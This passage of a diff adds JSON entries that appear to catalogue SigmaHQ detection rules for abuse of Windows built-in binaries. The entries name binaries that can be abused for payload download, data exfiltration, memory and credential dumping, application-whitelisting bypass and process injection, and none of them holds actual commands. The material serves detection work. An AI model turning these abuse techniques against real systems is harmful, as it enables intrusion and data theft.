This activity is pretty suspicious and should be investigated.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule), Michael Haag, Christopher Peacock @securepeacock (Update), SCYTHE @scythe_io (Update)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbins_by_office_applications.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/splunk/security_content/blob/develop/detections/endpoint/office_spawning_control.yml", + "https://twitter.com/andythevariable/status/1576953781581144064?s=20&t=QiJILvK4ZiBdR8RJe24u-A", + "https://www.elastic.co/security-labs/exploring-the-ref2731-intrusion-set", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_by_office_applications.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "23daeb52-e6eb-493c-8607-c4f0246cb7d8", + "value": "New Lolbin Process by Office Applications" + }, + { + "description": "This rule will monitor LOLBin process creations by wmiprvse. 
Add more LOLBins to rule logic if needed.", + "meta": { + "author": "Vadim Khrykov (ThreatIntel), Cyb3rEng (Rule)", + "creation_date": "2021/08/23", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbins_with_wmiprvse_parent_process.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://thedfirreport.com/2021/03/29/sodinokibi-aka-revil-ransomware/", + "https://github.com/vadim-hunter/Detection-Ideas-Rules/blob/02bcbfc2bfb8b4da601bb30de0344ae453aa1afe/Threat%20Intelligence/The%20DFIR%20Report/20210329_Sodinokibi_(aka_REvil)_Ransomware.yaml", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbins_with_wmiprvse_parent_process.yml" + ], + "tags": [ + "attack.t1204.002", + "attack.t1047", + "attack.t1218.010", + "attack.execution", + "attack.defense_evasion" + ] + }, + "uuid": "8a582fe2-0882-4b89-a82a-da6b2dc32937", + "value": "Lolbins Process Creation with WmiPrvse" + }, + { + "description": "The \"AdPlus.exe\" binary that is part of the Windows SDK can be used as a lolbin to dump process memory and execute arbitrary commands", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/09", + "falsepositive": [ + "Legitimate usage of Adplus" + ], + "filename": "proc_creation_win_lolbin_adplus.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Adplus/", + "https://twitter.com/nas_bench/status/1534916659676422152", + "https://twitter.com/nas_bench/status/1534915321856917506", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_adplus.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1003.001" + ] + }, + "uuid": "2f869d59-7f6a-4931-992c-cce556ff2d53", + "value": "Use of Adplus.exe" + }, + { + 
"description": "Execute C# code with the Build Provider and proper folder structure in place.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_aspnet_compiler.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Aspnet_Compiler/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_aspnet_compiler.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "a01b8329-5953-4f73-ae2d-aa01e1f35f00", + "value": "Suspicious aspnet_compiler.exe Execution" + }, + { + "description": "Performs execution of specified file, can be used for defensive evasion.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/24", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_bash.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Bash/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_bash.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "5edc2273-c26f-406c-83f3-f4d948e740dd", + "value": "Suspicious Subsystem for Linux Bash Execution" + }, + { + "description": "Detects when a user downloads file by using CertOC.exe", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_certoc_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Certoc/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_certoc_download.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "70ad0861-d1fe-491c-a45f-fa48148a300d", + "value": "Suspicious File Download via CertOC.exe" + }, + { + "description": "Detects the execution of Xwizard tool with specific arguments which utilized to run custom class properties.", + "meta": { + "author": "Ensar Şamil, @sblmsrsn, @oscd_initiative", + "creation_date": "2020/10/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_class_exec_xwizard.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_class_exec_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "53d4bb30-3f36-4e8a-b078-69d36c4a79ff", + "value": "Custom Class Execution via Xwizard" + }, + { + "description": "Detects Execution via SyncInvoke in CL_Invocation.ps1 module", + "meta": { + "author": "oscd.community, Natalia Shornikova", + "creation_date": "2020/10/14", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_invocation.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/Cl_invocation/", + "https://twitter.com/bohops/status/948061991012327424", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_invocation.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "a0459f02-ac51-4c09-b511-b8c9203fc429", + "value": "Execution via CL_Invocation.ps1" + }, + { + "description": "Detects the use of a Microsoft signed script to 
execute commands and bypassing AppLocker.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_loadassembly.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://bohops.com/2018/01/07/executing-commands-and-bypassing-applocker-with-powershell-diagnostic-scripts/", + "https://lolbas-project.github.io/lolbas/Scripts/CL_LoadAssembly/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_loadassembly.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "c57872c7-614f-4d7f-a40d-b78c8df2d30d", + "value": "CL_LoadAssembly.ps1 Proxy Execution" + }, + { + "description": "Detects the use of a Microsoft signed script to execute commands", + "meta": { + "author": "oscd.community, Natalia Shornikova, frack113", + "creation_date": "2022/05/21", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cl_mutexverifiers.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Scripts/CL_mutexverifiers/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cl_mutexverifiers.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "1e0e1a81-e79b-44bc-935b-ddb9c8006b3d", + "value": "CL_Mutexverifiers.ps1 Proxy Execution" + }, + { + "description": "lolbas Cmdl32 is use to download a payload to evade antivirus", + "meta": { + "author": "frack113", + "creation_date": "2021/11/03", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_cmdl32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://lolbas-project.github.io/lolbas/Binaries/Cmdl32/", + "https://twitter.com/SwiftOnSecurity/status/1455897435063074824", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cmdl32.yml" + ], + "tags": [ + "attack.execution", + "attack.defense_evasion", + "attack.t1218", + "attack.t1202" + ] + }, + "uuid": "f37aba28-a9e6-4045-882c-d5004043b337", + "value": "Suspicious Cmdl32 Execution" + }, + { + "description": "Upload file, credentials or data exfiltration with Binary part of Windows Defender", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_configsecuritypolicy.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/ConfigSecurityPolicy/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_configsecuritypolicy.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ] + }, + "uuid": "1f0f6176-6482-4027-b151-00071af39d7e", + "value": "Suspicious ConfigSecurityPolicy Execution" + }, + { + "description": "Adversaries can abuse of C:\\Windows\\System32\\gatherNetworkInfo.vbs script along with cscript.exe to gather information about the target", + "meta": { + "author": "blueteamer8699", + "creation_date": "2022/01/03", + "falsepositive": [ + "Administrative activity" + ], + "filename": "proc_creation_win_lolbin_cscript_gathernetworkinfo.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://posts.slayerlabs.com/living-off-the-land/#gathernetworkinfovbs", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_cscript_gathernetworkinfo.yml" + ], + "tags": [ + "attack.discovery", + "attack.execution", + "attack.t1615", + 
"attack.t1059.005" + ] + }, + "uuid": "575dce0c-8139-4e30-9295-1ee75969f7fe", + "value": "GatherNetworkInfo.vbs Script Usage" + }, + { + "description": "Detects the execution of CustomShellHost binary where the child isn't located in 'C:\\Windows\\explorer.exe'", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_customshellhost.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/180", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_customshellhost.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216" + ] + }, + "uuid": "84b14121-9d14-416e-800b-f3b829c5a14d", + "value": "Suspicious CustomShellHost Execution" + }, + { + "description": "Detects when a user performs data exfiltration by using DataSvcUtil.exe", + "meta": { + "author": "Ialle Teixeira @teixeira0xfffff, Austin Songer @austinsonger", + "creation_date": "2021/09/30", + "falsepositive": [ + "DataSvcUtil.exe being used may be performed by a system administrator.", + "Verify whether the user identity, user agent, and/or hostname should be making changes in your environment.", + "DataSvcUtil.exe being executed from unfamiliar users should be investigated. If known behavior is causing false positives, it can be exempted from the rule." 
+ ], + "filename": "proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" + ], + "tags": [ + "attack.exfiltration", + "attack.t1567" + ] + }, + "uuid": "e290b10b-1023-4452-a4a9-eb31a9013b3a", + "value": "LOLBAS Data Exfiltration by DataSvcUtil.exe" + }, + { + "description": "Detects the execution of DeviceCredentialDeployment to hide a process from view", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unlikely" + ], + "filename": "proc_creation_win_lolbin_device_credential_deployment.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/147", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_device_credential_deployment.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "b8b1b304-a60f-4999-9a6e-c547bde03ffd", + "value": "DeviceCredentialDeployment Execution" + }, + { + "description": "Compress target file into a cab file stored in the Alternate Data Stream (ADS) of the target file.", + "meta": { + "author": "frack113", + "creation_date": 
"2021/11/26", + "falsepositive": [ + "Very Possible" + ], + "filename": "proc_creation_win_lolbin_diantz_ads.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "6b369ced-4b1d-48f1-b427-fdc0de0790bd", + "value": "Suspicious Diantz Alternate Data Stream Execution" + }, + { + "description": "Download and compress a remote file and store it in a cab file on local machine.", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_diantz_remote_cab.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Diantz/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_diantz_remote_cab.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "185d7418-f250-42d0-b72e-0c8b70661e93", + "value": "Suspicious Diantz Download and Compress Into a CAB File" + }, + { + "description": "Detects the execution of Xwizard tool from the non-default directory which can be used to sideload a custom xwizards.dll", + "meta": { + "author": "Christian Burkard", + "creation_date": "2021/09/20", + "falsepositive": [ + "Windows installed on non-C drive" + ], + "filename": "proc_creation_win_lolbin_dll_sideload_xwizard.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Xwizard/", + "http://www.hexacorn.com/blog/2017/07/31/the-wizard-of-x-oppa-plugx-style/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dll_sideload_xwizard.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1574.002" + ] + }, + "uuid": "193d5ccd-6f59-40c6-b5b0-8e32d5ddd3d1", + "value": "Xwizard DLL Sideloading" + }, + { + "description": "Detects when a user bypasses Defender by renaming a tool to dump64.exe and placing it in a Visual Studio folder", + "meta": { + "author": "Austin Songer @austinsonger, Florian Roth", + "creation_date": "2021/11/26", + "falsepositive": [ + "Dump64.exe in other folders than the excluded one" + ], + "filename": "proc_creation_win_lolbin_dump64.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/mrd0x/status/1460597833917251595", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_dump64.yml" + ], + "tags": [ + "attack.credential_access", + "attack.t1003.001" + ] + }, + "uuid": "129966c9-de17-4334-a123-8b58172e664d", + "value": "Suspicious Dump64.exe Execution" + }, + { + "description": "Adversaries can abuse winget to download payloads remotely and execute them without touching disk. Winget will be included by default in Windows 10 and is already available in Windows 10 insider programs. The manifest option enables you to install an application by passing in a YAML file directly to the client. Winget can be used to download and install exe's, msi, msix files later.", + "meta": { + "author": "Sreeman, Florian Roth, Frack113", + "creation_date": "2020/04/21", + "falsepositive": [ + "Admin activity installing packages not in the official Microsoft repo. Winget probably won't be used by most users." 
+ ], + "filename": "proc_creation_win_lolbin_execution_via_winget.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/package-manager/winget/install#local-install", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_execution_via_winget.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "313d6012-51a0-4d93-8dfc-de8553239e25", + "value": "Monitoring Winget For LOLbin Execution" + }, + { + "description": "Extexport.exe loads dll and is execute from other folder the original path", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extexport.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extexport/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extexport.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "fb0b815b-f5f6-4f50-970f-ffe21f253f7a", + "value": "Suspicious Extexport Execution" + }, + { + "description": "Download or Copy file with Extrac32", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extrac32.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32.yml" + ], + "tags": [ + "attack.command_and_control", + "attack.t1105" + ] + }, + "uuid": "aa8e035d-7be4-48d3-a944-102aec04400d", + "value": "Suspicious 
Extrac32 Execution" + }, + { + "description": "Extract data from cab file and hide it in an alternate data stream", + "meta": { + "author": "frack113", + "creation_date": "2021/11/26", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_extrac32_ads.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Extrac32/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_extrac32_ads.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1564.004" + ] + }, + "uuid": "4b13db67-0c45-40f1-aba8-66a1a7198a1e", + "value": "Suspicious Extrac32 Alternate Data Stream Execution" + }, + { + "description": "Attackers can use findstr to hide their artifacts or search specific strings and evade defense mechanism", + "meta": { + "author": "Furkan CALISKAN, @caliskanfurkan_, @oscd_initiative, Nasreddine Bencherchali", + "creation_date": "2020/10/05", + "falsepositive": [ + "Administrative findstr usage" + ], + "filename": "proc_creation_win_lolbin_findstr.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Findstr/", + "https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/", + "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_findstr.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218", + "attack.t1564.004", + "attack.t1552.001", + "attack.t1105" + ] + }, + "uuid": "bf6c39fc-e203-45b9-9538-05397c1b4f3f", + "value": "Abusing Findstr for Defense Evasion" + }, + { + "description": "Execute commands and binaries from the context of \"forfiles\". 
This is used as a LOLBIN for example to bypass application whitelisting.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/06/14", + "falsepositive": [ + "Legitimate use by a via a batch script or by an administrator." + ], + "filename": "proc_creation_win_lolbin_forfiles.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Forfiles/", + "https://pentestlab.blog/2020/07/06/indirect-command-execution/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_forfiles.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "9aa5106d-bce3-4b13-86df-3a20f1d5cf0b", + "value": "Use of Forfiles For Execution" + }, + { + "description": "The FSharp Interpreters, FsiAnyCpu.exe and FSi.exe, can be used for AWL bypass and is listed in Microsoft recommended block rules.", + "meta": { + "author": "Christopher Peacock @SecurePeacock, SCYTHE @scythe_io", + "creation_date": "2022/06/02", + "falsepositive": [ + "Legitimate use by a software developer." 
+ ], + "filename": "proc_creation_win_lolbin_fsharp_interpreters.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules", + "https://bohops.com/2020/11/02/exploring-the-wdac-microsoft-recommended-block-rules-part-ii-wfc-fsi/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/FsiAnyCpu/", + "https://lolbas-project.github.io/lolbas/OtherMSBinaries/Fsi/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_fsharp_interpreters.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059" + ] + }, + "uuid": "b96b2031-7c17-4473-afe7-a30ce714db29", + "value": "Use of FSharp Interpreters" + }, + { + "description": "Detects execution of ftp.exe script execution with the \"-s\" flag and any child processes ran by ftp.exe", + "meta": { + "author": "Victor Sergeev, oscd.community", + "creation_date": "2020/10/09", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ftp.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ftp/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ftp.yml" + ], + "tags": [ + "attack.execution", + "attack.t1059", + "attack.defense_evasion", + "attack.t1202" + ] + }, + "uuid": "06b401f4-107c-4ff9-947f-9ec1e7649f1e", + "value": "LOLBIN Execution Of The FTP.EXE Binary" + }, + { + "description": "Detects the execution of the LOLBIN gpscript, which executes logon or startup scripts configured in Group Policy", + "meta": { + "author": "frack113", + "creation_date": "2022/05/16", + "falsepositive": [ + "Legitimate uses of logon scripts distributed via group policy" + ], + "filename": 
"proc_creation_win_lolbin_gpscript.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://oddvar.moe/2018/04/27/gpscript-exe-another-lolbin-to-the-list/", + "https://lolbas-project.github.io/lolbas/Binaries/Gpscript/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_gpscript.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "1e59c230-6670-45bf-83b0-98903780607e", + "value": "Gpscript Execution" + }, + { + "description": "Detect use of ie4uinit.exe to execute commands from a specially prepared ie4uinit.inf file from a directory other than the usual directories", + "meta": { + "author": "frack113", + "creation_date": "2022/05/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ie4uinit.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ie4uinit/", + "https://bohops.com/2018/03/10/leveraging-inf-sct-fetch-execute-techniques-for-bypass-evasion-persistence-part-2/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ie4uinit.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "d3bf399f-b0cf-4250-8bb4-dfc192ab81dc", + "value": "Ie4uinit Lolbin Use From Invalid Path" + }, + { + "description": "Detects execution of the IEExec utility to download payloads", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/05/16", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ieexec_download.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ieexec/", + 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ieexec_download.yml" + ], + "tags": "No established tags" + }, + "uuid": "9801abb8-e297-4dbf-9fbd-57dde0e830ad", + "value": "Abusing IEExec To Download Payloads" + }, + { + "description": "Detect use of Ilasm.exe to compile c# code into dll or exe.", + "meta": { + "author": "frack113", + "creation_date": "2022/05/07", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_ilasm.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Ilasm/", + "https://www.echotrail.io/insights/search/ilasm.exe", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_ilasm.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "850d55f9-6eeb-4492-ad69-a72338f65ba4", + "value": "Ilasm Lolbin Use Compile C-Sharp" + }, + { + "description": "Detects the use the .NET InstallUtil.exe application in order to download arbitrary files. 
The files will be written to %LOCALAPPDATA%\\Microsoft\\Windows\\INetCache\\IE\\", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_installutil_download.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://github.com/LOLBAS-Project/LOLBAS/pull/239", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_installutil_download.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1218" + ] + }, + "uuid": "75edd216-1939-4c73-8d61-7f3a0d85b5cc", + "value": "Suspicious Execution of InstallUtil To Download" + }, + { + "description": "Detects the execution of the LOLBIN jsc.exe used by .NET to compile javascript code to .exe or .dll format", + "meta": { + "author": "frack113", + "creation_date": "2022/05/02", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_jsc.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/Jsc/", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_jsc.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "52788a70-f1da-40dd-8fbd-73b5865d6568", + "value": "JSC Convert Javascript To Executable" + }, + { + "description": "Detects the execution of a signed binary dropped by Kaspersky Lab Products Remover (kavremover) which can be abused as a LOLBIN to execute arbitrary commands and binaries.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/11/01", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_kavremover.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 
"https://nasbench.medium.com/lolbined-using-kaspersky-endpoint-security-kes-installer-to-execute-arbitrary-commands-1c999f1b7fea", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_kavremover.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1127" + ] + }, + "uuid": "d047726b-c71c-4048-a99b-2e2f50dc107d", + "value": "Kavremover Dropped Binary LOLBIN Usage" + }, + { + "description": "Detects the use of the 'Launch-VsDevShell.ps1' Microsoft signed script to execute commands.", + "meta": { + "author": "Nasreddine Bencherchali", + "creation_date": "2022/08/19", + "falsepositive": [ + "Legitimate usage of the script by a developer" + ], + "filename": "proc_creation_win_lolbin_launch_vsdevshell.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/nas_bench/status/1535981653239255040", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_launch_vsdevshell.yml" + ], + "tags": [ + "attack.defense_evasion", + "attack.t1216.001" + ] + }, + "uuid": "45d3a03d-f441-458c-8883-df101a3bb146", + "value": "Launch-VsDevShell.PS1 Proxy Execution" + }, + { + "description": "Detects process injection using the signed Windows tool \"Mavinject\" via the \"INJECTRUNNING\" flag", + "meta": { + "author": "frack113, Florian Roth", + "creation_date": "2021/07/12", + "falsepositive": [ + "Unknown" + ], + "filename": "proc_creation_win_lolbin_mavinject_process_injection.yml", + "level": "high", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + 